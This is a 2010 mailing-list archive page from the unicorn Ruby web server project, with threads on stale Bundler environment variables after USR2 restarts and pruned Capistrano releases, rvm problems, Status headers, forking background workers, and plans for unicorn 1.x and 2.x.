Yes, puppet-server was misconfigured and it had gone unnoticed. The
reports are supposed to be accepted by another URL, and that had to be
configured appropriately.

Sorry for the false alarm.

-Naresh.

^ permalink raw reply	[relevance 5%]

* Re: javascript disappears
  @ 2010-08-18  3:39  3%       ` Jimmy Soho
  0 siblings, 0 replies; 200+ results
From: Jimmy Soho @ 2010-08-18  3:39 UTC (permalink / raw)
  To: unicorn list

> In your Capistrano deploy tasks, do you create/update the current
> symlink before you send USR2?  You should have the symlink updated
> before sending USR2..

Yes I do.

Meanwhile, I've been able to reproduce the issue I was seeing when
I prune releases. This is what I do:

- ls /srv/app/releases shows only:

  /srv/app/releases/20100818022900

- stop unicorn
- start unicorn
- deploy new release (same code actually)
- unicorn now has a different PID, /proc/31761/cwd does point to the
latest release directory:

  /proc/31761/cwd -> /srv/app/releases/20100818024514

- refresh browser, ok, no issue.
- rm -Rf /srv/app/releases/20100818022900
- deploy another new release
- refresh browser: javascripts/base.js is missing

nothing in unicorn.stderr.log, but looking in unicorn.stdout.log it mentions:

  /srv/app/releases/20100818022900/Gemfile not found

The unicorn process PID hasn't changed, nor has /proc/31761/cwd.

My /srv/app/current dir now points to the latest release, which I
guess is wrong as well, since unicorn failed to start with the latest
release; so it (= capistrano) needs to roll back somehow (which is a
different issue).

If I now peek in /proc/31761/environ then I notice these:

  GEM_HOME=/srv/app/releases/20100818022900/vendor/bundler_gems
  PATH=/srv/app/releases/20100818022900/vendor/bundler_gems/bin:[... etc.]
  GEM_PATH=/srv/app/releases/20100818022900/vendor/bundler_gems
  BUNDLE_GEMFILE=/srv/app/releases/20100818022900/Gemfile

which are all pointing to the working directory I pruned. Hence the
message about Gemfile not found I guess.

Any suggestions how / when to update those environment variables with
correct values?
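
One workaround sketch (the /srv/app/current layout and the variable
values are assumptions based on this thread, and unicorn's before_exec
hook is simulated here with a plain lambda) is to re-point those
variables at the stable "current" symlink before the USR2 re-exec:

```ruby
# Hypothetical unicorn.rb fragment: reset Bundler's environment to the
# "current" symlink before re-exec, so a pruned release directory is
# never referenced again.
APP_ROOT = "/srv/app/current"  # assumed deploy layout

before_exec = lambda do |_server|
  ENV["BUNDLE_GEMFILE"] = "#{APP_ROOT}/Gemfile"
  ENV["GEM_HOME"]       = "#{APP_ROOT}/vendor/bundler_gems"
  ENV["GEM_PATH"]       = ENV["GEM_HOME"]
end

before_exec.call(nil)  # unicorn would invoke this right before exec()
puts ENV["BUNDLE_GEMFILE"]
```

In a real config this would be written as `before_exec { |server| ... }`.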


> Other folks here may have more experience with Capistrano+Unicorn,
> maybe they have portable recipes they can share.

Maybe it's more a gem and/or bundler thing?  Though it seems like a
general issue to me that environment variables can keep references to
old working directories, which need to be updated if you restart
Unicorn with USR2 all the time.  Is this something Unicorn could
possibly take care of?


Jimmy


^ permalink raw reply	[relevance 3%]

* Re: running unicorn under rvm
  2010-08-17 22:37  4%   ` Joseph McDonald
@ 2010-08-18  1:08  0%     ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2010-08-18  1:08 UTC (permalink / raw)
  To: Joseph McDonald; +Cc: unicorn list

Joseph McDonald <superjoe@gmail.com> wrote:
> I'm sure I'm running the right version of unicorn.
> what's weird is if I remove the reference to TOPLEVEL_BINDING, it works, i.e.:
> 
>  host, port, set_listener, options, daemonize =
>                     eval("[ host, port, set_listener, options, daemonize ]")
> 
> works, it gets the right port from the config.ru file.

Hm... I'm stumped.  However, you're really encouraging me to pause other
projects, work on 2.0 and release it this week/weekend :)  I suppose
some of the crazier 2.0 stuff I proposed can wait until 3.x.

> my config.ru file looks like"
> #\ -w -p 4452
> require './mystuff'
> run Sinatra::Application
> 
> another strange thing:  I need to add the "./"  in front of mystuff,
> but when i'm not using rvm (rvm use system), I don't need to do that.

Odd... needing the './' feels like it's using Ruby 1.9.2 or later...
Can you print out RUBY_VERSION in there to be certain?

I just tried rvm for the first time with a fresh user/home directory on my
system and everything works as expected with 1.8.7 (it just picked p302, not
p299, but that shouldn't make a difference...).

> I'm curious if anyone else is using unicorn with rvm and not having
> this problem.  I'm guessing it's something weird with my system, but
> not sure.

If you have root on your machine, just try creating a new user and start
with a blank $HOME.  I often do that to narrow things down when
debugging/testing code and don't feel like going all the way with chroot
or VM.

-- 
Eric Wong


^ permalink raw reply	[relevance 0%]

* Re: running unicorn under rvm
  @ 2010-08-17 22:37  4%   ` Joseph McDonald
  2010-08-18  1:08  0%     ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Joseph McDonald @ 2010-08-17 22:37 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn list

Thanks Eric, see below:

On Mon, Aug 16, 2010 at 8:52 PM, Eric Wong <normalperson@yhbt.net> wrote:
> Joseph McDonald <superjoe@gmail.com> wrote:
>> unicorn 1.1.2 runs fine under my system ruby, but when trying to run
>> it using rvm, I get:
>>
>>
>> % rvm use 1.8.7
>> info: Using ruby 1.8.7 p299
>>
>> % unicorn
>> /home/joe/.rvm/gems/ruby-1.8.7-p299/gems/unicorn-1.1.2/lib/unicorn/configurator.rb:494:in
>> `eval': undefined local variable or method `host' for main:Object
>> (NameError)
>
> Hi Joseph,
>
> Is there any chance you have an older "unicorn" executable script
> somewhere that gets exposed when rvm switches the environment on you?  That's
> the only thing I can think of right now.

I'm sure I'm running the right version of unicorn.
What's weird is that if I remove the reference to TOPLEVEL_BINDING, it works, i.e.:

 host, port, set_listener, options, daemonize =
                    eval("[ host, port, set_listener, options, daemonize ]")

works, it gets the right port from the config.ru file.
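
The difference can be illustrated in isolation (a sketch, not unicorn's
code): eval with no explicit binding sees the caller's locals, while
eval against TOPLEVEL_BINDING only sees top-level locals, producing
exactly the NameError from the original report.

```ruby
def with_local_binding
  host = "0.0.0.0"
  eval("host")                    # resolves host in this method: works
end

def with_toplevel_binding
  host = "0.0.0.0"
  eval("host", TOPLEVEL_BINDING)  # no local `host' at top level
rescue NameError => e
  e.class.name
end

puts with_local_binding    # => 0.0.0.0
puts with_toplevel_binding # => NameError
```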

My config.ru file looks like:
#\ -w -p 4452
require './mystuff'
run Sinatra::Application

Another strange thing: I need to add the "./" in front of mystuff,
but when I'm not using rvm (rvm use system), I don't need to do that.

I'm curious if anyone else is using unicorn with rvm and not having
this problem.  I'm guessing it's something weird with my system, but
not sure.

thanks,
-joe





>
>> line 494 looks like:
>>
>>  # XXX ugly as hell, WILL FIX in 2.x (along with Rainbows!/Zbatery)
>
> Yes, I still need to work on 2.x and clean up a lot of the
> ugly internal API bits :)
>
>
> --
> Eric Wong
>
> P.S.: At least nowadays I'm (finally) getting some experience
> developing/supporting applications using Unicorn and Rainbows! (or
> Zbatery).  Things like e4d0b226391948ef433f1d0135814315e4c48535 in
> unicorn.git are a direct result of that.
>


^ permalink raw reply	[relevance 4%]

* Re: [ANN] unicorn 1.0.1 and 1.1.2 - fix rollbacks
  @ 2010-07-16  0:47  2%             ` Lawrence Pit
  0 siblings, 0 replies; 200+ results
From: Lawrence Pit @ 2010-07-16  0:47 UTC (permalink / raw)
  To: unicorn list


>> It appears unicorn rolls back by itself when it can't start the new master. Nice!
>>
>> Jamie also mentions to use the shared vendor/bundler_gems path.  Though I do use that in all my projects I'm not so sure it's wise to do when you can't afford any downtime.  I'll have to wait for unicorn v1.1.3 before I can test whether rolling back will indeed continue with unicorn v1.1.2 instead of v1.1.3 ;o
>>     
>
> Hi Lawrence, why does the shared vendor/bundler_gems cause you downtime? From not re-bundling during rollback?
>
> FWIW I made that recommendation because I ran into issues with unicorns not restarting correctly after running `cap deploy:cleanup`, since the `bundle exec` launches a binary with a path like /app/releases/201007125236/bin/unicorn, which goes missing after N deploys. I haven't tested if this applies to more recent versions
>
> Shared bundles are also significantly faster -- `bundle check || bundle install` is ~1s for me vs. several minutes to totally rebundle
>   

Hi Jamie, I see what you mean. I haven't tested this yet, so I don't
know for sure if it could cause downtime. I also always use
`bundle check || bundle install` to get that time benefit.

My worry was indeed that it might pick a newer unicorn to restart 
workers for the old master. I guess that can/should be prevented by 
having an on_rollback in my capistrano bundler task.


What is the exact command you use to start unicorn?


What I see is this, I start with:

$ su -l deployer -c "cd /app/current ; bundle exec unicorn_rails -D -c 
/app/current/config/unicorn.rb"

My after_fork and before_exec methods output the ENV vars to the unicorn 
log. I see for example:

AFTER_FORK: VERSION 1
PATH=/app/releases/20100714054705/vendor/bundler_gems/bin:....
GEM_HOME=/app/releases/20100714054705/vendor/bundler_gems
GEM_PATH=/app/releases/20100714054705/vendor/bundler_gems:/app/releases/20100714054705/vendor/bundler_gems/bundler/gems
BUNDLE_GEMFILE=/app/releases/20100714054705/Gemfile

Note that /app/releases/20100714054705/vendor/bundler_gems is a symlink 
to /app/releases/shared/vendor/bundler_gems

When I deploy a new version, symlink /app/current to the new release 
directory, and send USR2 :

executing 
["/app/releases/20100714054705/vendor/bundler_gems/bin/unicorn_rails", 
"-D", "-E", "staging", "-c", "/app/current/config/unicorn.rb"] (in 
/app/releases/20100714055624)
BEFORE_EXEC: VERSION 1
PATH=/app/releases/20100714054705/vendor/bundler_gems/bin:....
GEM_HOME=/app/releases/20100714054705/vendor/bundler_gems
GEM_PATH=/app/releases/20100714054705/vendor/bundler_gems:/app/releases/20100714054705/vendor/bundler_gems/bundler/gems
BUNDLE_GEMFILE=/app/releases/20100714054705/Gemfile
I, [2010-07-15T23:31:47.765995 #23084]  INFO -- : inherited 
addr=/tmp/.unicorn_sock fd=3
I, [2010-07-15T23:31:47.766646 #23084]  INFO -- : Refreshing Gem list
/app/releases/20100714055624/.bundle/environment.rb:175: warning: 
already initialized constant ENV_LOADED
/app/releases/20100714055624/.bundle/environment.rb:176: warning: 
already initialized constant LOCKED_BY
/app/releases/20100714055624/.bundle/environment.rb:177: warning: 
already initialized constant FINGERPRINT
/app/releases/20100714055624/.bundle/environment.rb:178: warning: 
already initialized constant HOME
/app/releases/20100714055624/.bundle/environment.rb:179: warning: 
already initialized constant AUTOREQUIRES
/app/releases/20100714055624/.bundle/environment.rb:181: warning: 
already initialized constant SPECS
AFTER_FORK: VERSION 2
PATH=/app/releases/20100714054705/vendor/bundler_gems/bin:....
GEM_HOME=/app/releases/20100714055624/vendor/bundler_gems
GEM_PATH=/app/releases/20100714055624/vendor/bundler_gems:/app/releases/20100714055624/vendor/bundler_gems/bundler/gems
BUNDLE_GEMFILE=/app/releases/20100714054705/Gemfile


What you see here is that the new worker does have correct GEM_HOME and 
GEM_PATH values, but the PATH and BUNDLE_GEMFILE values are pointing to 
the old dir.

Are those bundler warnings something to worry about?

The BUNDLE_GEMFILE value is worrying, I think. I haven't tested this, but
I'm pretty sure that when Bundler.setup is called within your app it will
actually set up using the old Gemfile. So that would mean you need to
reset it somehow?  I don't see how at the moment...  Should unicorn
provide a method similar to +working_directory+ to help ensure the
application always uses the "current" Gemfile (e.g.
"/app/current/Gemfile")?  It sounds kind of strange that unicorn should
provide such a method; is there another way?

What about that PATH value?  What happens if 10 deployments later the 
dir /app/releases/20100714054705 is pruned? I tried. After removing that 
dir I could still send a HUP, but when I send a USR2 I get this:

/app/releases/20100714054705/vendor/bundler_gems/gems/unicorn-1.1.2/lib/unicorn.rb:573:in 
`exec': No such file or directory - 
app/releases/20100714054705/vendor/bundler_gems/bin/unicorn_rails 
(Errno::ENOENT)
        from 
/app/releases/20100714054705/vendor/bundler_gems/gems/unicorn-1.1.2/lib/unicorn.rb:573:in 
`reexec'


 > since the `bundle exec` launches a binary with a path like 
/app/releases/201007125236/bin/unicorn,
 > which goes missing after N deploys


That's what I'm seeing. How did using shared vendor/bundler_gems help 
you?  Because I'm starting with bundle exec using shared 
vendor/bundler_gems as well.




Cheers,
Lawrence


^ permalink raw reply	[relevance 2%]

* Re: Purpose of "Status" header in HTTP responses?
  @ 2010-06-23  9:07  3% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2010-06-23  9:07 UTC (permalink / raw)
  To: unicorn list; +Cc: Craig Davey

Craig Davey <me@craigdavey.ca> wrote:
> Hi folks
> 
> On line #63 of unicorn/http_response.rb a "Status" header is written
> to the socket. A comment in the code explains that some broken clients
> require this header and unicorn generously accommodates them.
> 
> We’re having the opposite problem. One of our clients using Microsoft
> Windows and ASP hasn't been able to connect to our HTTP API since we
> moved it to unicorn from passenger. They receive the following error
> message when they try to connect to our servers:
> 
> msxml3.dll error '80072f78' server returned an invalid or unrecognized
> response

Hi Craig,

Interesting and strange...

Looking at lib/phusion_passenger/rack/request_handler.rb (blob ad22dfa)
line 94, they set the Status: header, too (but just the numeric
code, no text).

You can try "proxy_hide_header Status;" in your nginx config
to suppress it.


Another theory: You are running nginx in front of Unicorn, right?

If not (but you really should be), the lack of a Server header may throw
off some clients...

I also don't ever want folks to be forced to reveal which server they
use for security reasons, so Unicorn won't ever force the
Server: header on you.  And since nginx overwrites any Server header
Unicorn would set, Unicorn won't bother, either.  However, it's easy to
set up Rack middleware to write anything you want in the Server header.
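
Such middleware fits in a dozen lines.  A rough sketch along the lines of
the Rainbows::ServerToken idea (the class name and default token here are
made up, not part of Unicorn):

```ruby
# Rack middleware sketch: write a Server header on every response so
# clients that expect one (e.g. when running without nginx) see it.
class ServerToken
  def initialize(app, token = 'unicorn')
    @app = app
    @token = token
  end

  def call(env)
    status, headers, body = @app.call(env)
    headers['Server'] = @token  # overwrite/insert the Server header
    [ status, headers, body ]
  end
end
```

In config.ru: `use ServerToken, 'Apache'` -- or whatever string you want
clients to see.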

rainbows.git (unreleased) allows using the Rainbows::ServerToken
middleware, and if you really need it, it should be easy to port to
Unicorn:

  http://git.bogomips.org/cgit/rainbows.git/tree/lib/rainbows/server_token.rb

> Our client thinks this error is caused by the "Status" header that is
> added to responses by unicorn. We don’t know of any other instances
> where this header is causing problems so we’re pretty confused about
> why it’s a problem for them.

Passenger also adds X-Powered-By, but that's completely non-standard and
probably used to get around proxies (like nginx) that overwrite the
standard Server: header.  You can also make middleware (or your app) add
that header, too, and even go as far as to make Unicorn pretend to be
Passenger :>

> Does anyone remember why this "Status" header was added to
> HttpResponse? Which broken clients was the change trying to
> accommodate?

I seem to recall some JavaScript libraries relied on it at some point,
and possibly some versions of Firebug.  Maybe some browser plugins do,
too.  Some folks here with more experience on client-side stuff ought
to chime in, since I generally stay away from GUI/DOM things.

However, even with my lack of JS experience (or because of) I realize
it's very easy to fall into the trap of writing JavaScript that relies
on the Status: header.  The Status: header has been with us as a
de-facto standard since the CGI days.  Older cgi.rb-based versions of
Rails set it, too.

-- 
Eric Wong

* Re: scaling unicorn
  @ 2010-06-22 18:57  4%         ` Jamie Wilkinson
  0 siblings, 0 replies; 200+ results
From: Jamie Wilkinson @ 2010-06-22 18:57 UTC (permalink / raw)
  To: unicorn list

>> Somewhat related -- I've been meaning to discuss the finer points of
>> backlog tuning.
>> 
>> I've been experimenting with the multi-server socket+TCP megaunicorn
>> configuration from your CDT:
>> http://rubyforge.org/pipermail/mongrel-unicorn/2009-September/000033.html

On Jun 22, 2010, at 11:03 AM, snacktime wrote:

> Seems like you would have some type of 'reserve'
> cluster for requests that hit the listen backlog, and when you start
> seeing too much traffic going to the reserve, you add more servers to
> your main pool.  How else would you manage the configuration for
> something like this when you are working with 100 - 200 servers?  You
> can't be changing the nginx configs every time you add servers, that's
> just not practical.

We are using chef for machine configuration, which makes these kinds of numbers doable:
http://wiki.opscode.com/display/chef/Home

I would love to see an nginx module for distributed configuration management

Right now we are running 6 frontend machines, 4 in use & 2 in reserve like you described. We are doing about 5000rpm with this, almost all dynamic. 10-30% of requests might be 'slow' (1+s) depending on usage patterns. 

To measure health I am using munin to watch system load, nginx requests & nginx errors. In this configuration 502 Bad Gateways from frontend nginx indicate a busy unicorn socket & thus a handoff of the request to the backups. Then we measure the rails production.log for request counts + speed on each server as well as using NewRelic RPM

monit also emails us when 502s show up. 
In theory monit could automatically spin up another backup server, provision it using chef, then reprovision the rest of the cluster to start handing over traffic. Alternately the new server could just act as backup for the one overloaded machine, which could make isolating performance issues easier.

-jamie


* Re: Forking off the unicorn master process to create a background worker
  @ 2010-06-16  0:06  4%         ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2010-06-16  0:06 UTC (permalink / raw)
  To: Russell Branca; +Cc: unicorn list

Russell Branca <chewbranca@gmail.com> wrote:
> On Tue, Jun 15, 2010 at 3:14 PM, Eric Wong <normalperson@yhbt.net> wrote:
> > Russell Branca <chewbranca@gmail.com> wrote:
> >> Hello Eric,
> >>
> >> Sorry for the delayed response, with the combination of being sick and
> >> heading out of town for a while, this project got put on the
> >> backburner. I really appreciate your response and think it's a clean
> >> solution for what I'm trying to do. I've started back in getting the
> >> job queue working this week, and will hopefully have a working
> >> solution in the next day or two. A little more information about what
> >> I'm doing, I'm trying to create a centralized resque job queue server
> >> that each of the different applications can queue work into, so I'll
> >> be using redis behind resque for storing jobs and what not, which
> >> brings me an area I'm not sure of the best approach on. So when we hit
> >> the job queue endpoint in the rack app, it spawns the new worker, and
> >> then immediately returns the 200 ok started background job message,
> >> which cuts off communication back to the job queue. My plan is to save
> >> a status message of the result of the background task into redis, and
> >> have resque check that to verify the task was successful. Is there a
> >> better approach for returning the resulting status code with unicorn,
> >> or is this a reasonable approach? Thanks again for your help.
> >
> > Hi Russell, please don't top post, thanks.
> >
> > If you already have a queue server (and presumably a standalone app
> > processing the queue), I would probably forgo the background Unicorn
> > worker entirely.
> >
> > Based on my ancient (mid-2000s) knowledge of user-facing web
> > applications: the application should queue the job, return 200, and have
> > HTML meta refresh to constantly reload the page every few seconds.
> >
> > Hitting the reload endpoint would check the database (Redis in this
> > case) for completion, and return a new HTML page to stop the meta
> > refresh loop.
> >
> > This means you're no longer keeping a single Unicorn worker idle and
> > wasting it.  Nowadays you could do it with long-polling on
> > Rainbows!/Thin/Zbatery, too, but long-polling is less reliable for
> > people switching between WiFi access points.  The meta refresh method
> > can be a waste of power/bandwidth on the client side if the background
> > job takes a long time, though.
> >
> > I'm not familiar at all with Resque or Redis, but I suspect other folks
> > on this mailing list should be able to help you flesh out the details.
> 
> Hi Eric,
> 
> I have a queue server, but I don't have a standalone app processing
> the jobs, because I have a large number of stand alone applications on
> a single server. Right now I've got 12 separate apps running, so if I
> wanted to have a standalone app for each, that would be 12 additional
> applications in memory for handling background jobs. The whole reason
> I want to go with the unicorn worker approach for handling background
> jobs, is so I can fork off the master process as needed, avoid the
> spawning time for a normal rails instance, and only use workers as
> needed. This way I can have just a few workers running at any given
> time, rather than 1 worker for each app. The number of apps is only
> going to increase, but I want to keep the worker pool a constant. I'll
> probably just update status of completion with redis, these jobs won't
> be run by users, this is all background stuff like sending
> notifications, data analysis, feed parsing, etc etc, so I'm planning
> on just having resque initiate a request directly, and then use
> unicorn to process the task in the background.

Ah, so I guess it's a single queue server but multiple queues?  I
guess that's where I got confused with your description.

> I didn't exactly follow what you meant when you were talking about a
> unicorn worker being idle, from the example config.ru you responded
> with earlier on, it looks like I can just spawn a new worker that will
> be outside of the normal worker pool to handle the job. I'm pretty
> sure this will work, I was curious about the best approach for
> returning completion status, but I think just having the worker record
> its status and exit is better than having long polling connections
> open between the job queue and the new unicorn worker.

Yes, forking as in the example should work.  I haven't
tested it, of course :)  My instincts tell me recording the status and
exiting ASAP is better because it uses less memory.
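
That record-then-exit flow can be sketched roughly like this.  A file
under a status directory stands in for the Redis key here, and the helper
name is made up; this is untested scaffolding, not the poster's actual
setup:

```ruby
require 'tmpdir'

# Fork a child that does the work, records its outcome where the queue
# can poll for it, then exits with exit! to skip at_exit handlers and
# avoid re-entering the worker's normal response cycle.
def run_background_job(job_id, status_dir)
  pid = fork do
    begin
      # ... real background work goes here ...
      File.write(File.join(status_dir, job_id), 'done')
    rescue => e
      File.write(File.join(status_dir, job_id), "failed: #{e.class}: #{e.message}")
    ensure
      exit!(0)
    end
  end
  Process.waitpid(pid)  # reap the child (or double-fork and let init do it)
end
```

With Redis, the File.write calls would become SET on a "job:<id>" key
that resque (or anything else) checks for completion.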

You should test and experiment with it either way.  You know your apps,
requirements, and Redis/Resque far better than I do :)  Consider
software an evolutionary process, so whatever the "best approach" may
be, another one can usurp it eventually or be completely wrong in a
slightly different setting :)

-- 
Eric Wong

* Re: Forking off the unicorn master process to create a background  worker
  2010-05-26 21:05  0% ` Eric Wong
@ 2010-06-15 17:55  0%   ` Russell Branca
    0 siblings, 1 reply; 200+ results
From: Russell Branca @ 2010-06-15 17:55 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn list

Hello Eric,


Sorry for the delayed response, with the combination of being sick and
heading out of town for a while, this project got put on the
backburner. I really appreciate your response and think it's a clean
solution for what I'm trying to do. I've started back in getting the
job queue working this week, and will hopefully have a working
solution in the next day or two. A little more information about what
I'm doing, I'm trying to create a centralized resque job queue server
that each of the different applications can queue work into, so I'll
be using redis behind resque for storing jobs and what not, which
brings me an area I'm not sure of the best approach on. So when we hit
the job queue endpoint in the rack app, it spawns the new worker, and
then immediately returns the 200 ok started background job message,
which cuts off communication back to the job queue. My plan is to save
a status message of the result of the background task into redis, and
have resque check that to verify the task was successful. Is there a
better approach for returning the resulting status code with unicorn,
or is this a reasonable approach? Thanks again for your help.


-Russell

On Wed, May 26, 2010 at 2:05 PM, Eric Wong <normalperson@yhbt.net> wrote:
> Russell Branca <chewbranca@gmail.com> wrote:
>> Hello,
>>
>> I'm trying to find an efficient way to create a new instance of a
>> rails application to perform some background tasks without having to
>> load up the entire rails stack every time, so I figured forking off
>> the master process would be a good way to go. Now I can easily just
>> increment the worker count and then send a web request in, but the new
>> worker would be part of the main worker pool, so in the time between
>> spawning a new worker and sending the request, another request could
>> have come in and snagged that worker. Is it possible to create a new
>> worker and not have it enter the main worker pool so I could access it
>> directly?
>
> Hi Russell,
>
> You could try having an endpoint in your webapp (with authentication, or
> have it reject env['REMOTE_ADDR'] != '127.0.0.1') that runs the
> background task for you.  Since it's a background app, you should
> probably fork + Process.setsid + fork (or Process.daemon in 1.9), and
> return an HTTP response immediately so your app can serve other
> requests.
>
> The following example should be enough to get you started (totally
> untested)
>
> ------------ config.ru -------------
> require 'rack/lobster'
>
> map "/.seekrit_endpoint" do
>  use Rack::ContentLength
>  use Rack::ContentType, 'text/plain'
>  run(lambda { |env|
>    return [ 403, {}, [] ] if env['REMOTE_ADDR'] != '127.0.0.1'
>    pid = fork
>    if pid
>      Process.waitpid(pid)
>
>      # cheap way to avoid unintentional fd sharing with our children,
>      # this causes the current Unicorn worker to exit after sending
>      # the response:
>      # Otherwise you'd have to be careful to disconnect+reconnect
>      # databases/memcached/redis/whatever (in both the parent and
>      # child) to avoid unintentional sharing that'll lead to headaches
>      Process.kill(:QUIT, $$)
>
>      [ 200, {}, [ "started background process\n" ] ]
>    else
>      # child, daemonize it so the unicorn master won't need to
>      # reap it (that's the job of init)
>      Process.setsid
>      exit if fork
>
>      begin
>        # run your background code here instead of sleeping
>        sleep 5
>        env["rack.logger"].info "done sleeping"
>      rescue => e
>        env["rack.logger"].error(e.inspect)
>      end
>      # make sure we don't enter the normal response cycle back in the
>      # worker...
>      exit!(0)
>    end
>  })
> end
>
> map "/" do
>  run Rack::Lobster.new
> end
>
>> I know this is not your typical use case for unicorn, and you're
>> probably thinking there is a lot better ways to do this, however, I
>> currently have a rails framework that powers a handful of standalone
>> applications on a server with limited resources, and I'm trying to
>> make a centralized queue that all the applications use, so the queue
>> needs to be able to spawn a new worker for each of the applications
>> efficiently, and incrementing/decrementing worker counts in unicorn is
>> the most efficient way I've found to spawn a new rails instance.
>
> Yeah, it's definitely an odd case and there are ways to shoot yourself
> in the foot with it (especially with unintentional fd sharing), but Ruby
> exposes all the Unix process management goodies better than most
> languages (probably better than anything else I've used).
>
>> Any help, suggestions or insight into this would be greatly appreciated.
>
> Let us know how it goes :)
>
> --
> Eric Wong
>

* Re: Unicorn future plans
  2010-06-14 20:58  3% ` John-Paul Bader
@ 2010-06-14 22:10  0%   ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2010-06-14 22:10 UTC (permalink / raw)
  To: unicorn list

John-Paul Bader <hukl@berlin.ccc.de> wrote:
> Hey, 
> 
> your plans sound great except for ignoring FreeBSD ;)
> 
> Seriously, many, many servers, including many that I administer, run
> on FreeBSD and they do so very well. I'm not very familiar with the
> internals of the FreeBSD kernel but I can assure you that it runs
> perfectly on 8 and 16 core machines and I would be extremely happy if I
> could continue to use unicorn on them.

Hi John-Paul,

Reread my post carefully, not much is changing for 8-16 core users.
FreeBSD and SMP will continue to be supported.  I wasn't referring
to SMP at all when I was talking about Linux-only bits.

> It should be easier to maintain a FreeBSD version as they (FreeBSD
> developers) tend to aim for more consistency across releases than
> Linux. You said once that you don't run any BSD machines but I'd be
> happy to offer you access to one of my BSD servers for testing.

Thanks for the offer.  I'll keep it in mind if I need it again.

> Furthermore since Mac OS X and FreeBSD share many features like kqueue
> and many Ruby developers are running Macs, it would make even more
> sense to at least care about BSD even if it's not your primary platform. 

I know, I've fixed some things on OSX platforms via FreeBSD (OSX scares
me with its GUI-ness).  Keep in mind kqueue (and epoll) are worthless
for Unicorn itself since Unicorn only handles one client at a time.

However, Rainbows! can already use kqueue/epoll with EventMachine and
Rev.

> I don't want to start a flame war or say that one OS is better than
> another. Linux is certainly great but so is FreeBSD. For the SMP part
> I recommend the following page on freebsd.org:

Again, I wasn't talking about SMP at all.   SMP works fine on current
Unicorn and mid-sized servers.  When going to more cores, SMP itself
is a bottleneck, not the kernel.

With Unicorn 2.x, I'm targeting NUMA hardware that isn't available in
commodity servers yet.  Currently, NUMA makes _zero_ sense in web
application servers, but in case things change in a few years, we'll be
ready.

It may be a chicken-and-egg problem, too.  Hardware manufacturers are
slow to commoditize NUMA because a good chunk of software can't even
utilize SMP effectively :)

> To conclude I can only say that I'm running unicorn on several FreeBSD
> hosts and so far I couldn't be happier with it. As stated before, I'd
> be more than happy to continue using that setup.

Again, don't worry :)  You'll be able to continue using everything
as-is.

> Kindest regards and thanks for all your efforts,

No problem.  Please don't top post in the future.

-- 
Eric Wong

* Re: Unicorn future plans
  @ 2010-06-14 20:58  3% ` John-Paul Bader
  2010-06-14 22:10  0%   ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: John-Paul Bader @ 2010-06-14 20:58 UTC (permalink / raw)
  To: unicorn list

Hey, 

your plans sound great except for ignoring FreeBSD ;)

Seriously, many, many servers, including many that I administer, run on FreeBSD, and they do so very well. I'm not very familiar with the internals of the FreeBSD kernel but I can assure you that it runs perfectly on 8 and 16 core machines and I would be extremely happy if I could continue to use unicorn on them.

It should be easier to maintain a FreeBSD version as they (FreeBSD developers) tend to aim for more consistency across releases than Linux. You said once that you don't run any BSD machines but I'd be happy to offer you access to one of my BSD servers for testing.

Furthermore, since Mac OS X and FreeBSD share many features like kqueue and many Ruby developers are running Macs, it would make even more sense to at least care about BSD even if it's not your primary platform. 

I don't want to start a flame war or say that one OS is better than another. Linux is certainly great but so is FreeBSD. For the SMP part I recommend the following page on freebsd.org:

http://www.freebsd.org/smp/

And maybe specifically:

http://www.freebsd.org/smp/#resources

To conclude I can only say that I'm running unicorn on several FreeBSD hosts and so far I couldn't be happier with it. As stated before, I'd be more than happy to continue using that setup.

Kindest regards and thanks for all your efforts,

John


On 14.06.2010, at 21:46, Eric Wong wrote:

> Hi all,
> 
> Some of you are wondering about the future of the project, especially
> since we're nearing a 1.0 release.
> 
> == 1.x - bugfixes and Rack-compatibility synchronization
> 
> The 1.x series will focus mainly on bug fixes and compatibility with
> Rack as it evolves.
> 
> If Rack drops the rewindability requirement of "rack.input", Unicorn
> will follow ASAP and allow TeeInput to be optional middleware with
> newer Rack versions.
> 
> Rubinius should be fully-supported soon, as it's already mostly working
> except for a few corner-case things Rubinius doesn't implement (issues
> filed on their bug tracker).
> 
> == 2.x - the fun and crazy stuff
> 
> First off, there'll be internal API cleanups + sync with
> Rainbows!/Zbatery This won't be user visible, but it'll be less ugly
> inside.
> 
> === Scalability improvements
> 
> I don't know if we'll see hundreds/thousands of CPUs in a single
> application server any time soon, but 2.x will have internal changes
> that'll make us more ready for that.  It could be 5-10 years before
> massively multi-core machines are viable for web apps, but it'd
> certainly be fun to max out Unicorn on those.
> 
> I'll be less shy about sacrificing portability for massive scalability.
> Correct me if I'm wrong, but Linux is the only Free kernel that scales
> to monster multicore machines right now, so I'll primarily focus on
> working with features in Linux.
> 
> Currently, 8-16 cores seems to be the sweet spot (and has been for a
> while), and present-day Unicorn handles that fine as-is.
> 
> === Features (for Rainbows!, mainly)
> 
> IPv6 support and SSL will come, too.   These features will mainly be to
> support Rainbows!, though some LANs could benefit from those, too.  I'll
> have to review the MRI code for those, but I'm leaning towards only
> these new features under 1.9.2+.
> 
> Multi-VM (MVM, Ruby 1.9 experimental branch) support will probably
> happen only in Rainbows! rather than Unicorn.  A true fork() is still
> safer in the event of a crash (but less memory-efficient).
> 
> == Miscellaneous
> 
> I have no plans to provide commercial support, but I'll continue
> offering free support on the mailing list (or private email if you're
> shy).
> 
> As some of you may have noticed; I don't endorse commercial products or
> services at all.  This won't change.  However, there will probably be
> more commercial support available from 3rd parties after a 1.0 release.
> 
> 
> Thanks for reading!
> 
> -- 
> Eric Wong


* Re: unicorn failing to start
  2010-05-28 18:49  4% ` Eric Wong
@ 2010-05-28 19:19  0%   ` Stefan Maier
  0 siblings, 0 replies; 200+ results
From: Stefan Maier @ 2010-05-28 19:19 UTC (permalink / raw)
  To: unicorn list

Am 28.05.10 20:49, schrieb Eric Wong:
> Stefan Maier <stefanmaier@gmail.com> wrote:
>> Hi,
>>
>> i'm trying to start up unicorn_rails with a rails 3 beta3 project. All I
>> can get out of it is this:
>> I, [2010-05-28T08:54:45.770957 #17852]  INFO -- : reaped
>> #<Process::Status: pid 17854 exit 1> worker=0
